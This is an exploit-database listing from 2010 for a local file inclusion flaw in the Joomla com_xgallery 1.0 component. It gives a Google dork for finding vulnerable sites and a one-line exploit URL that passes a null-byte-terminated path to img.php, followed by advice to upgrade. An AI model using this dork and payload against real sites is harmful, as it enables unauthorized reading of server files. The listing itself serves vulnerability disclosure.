[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability

Author
KelvinX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15225
Category
web applications
Date add
22-12-2010
Platform
php
# Exploit Title: Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability
# Author: KelvinX (kelvinxgr@gmail.com)
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 21-2010
# Location: HCM City, Vietnam
 
 ------------------------
 
# Application: com_xgallery
# Version: 1.0
# Vendor: http://www.optikool.com/documentation/xmovie-component
# Google Dorks: inurl:com_xgallery
 
------------------------
 
Exploit: http://127.0.0.1/[path]/components/com_xgallery/helpers/img.php?file=[LFI]%00
 
------------------------
 
# Solution: Upgrade to the most recent version



#  0day.today [2024-12-25]  #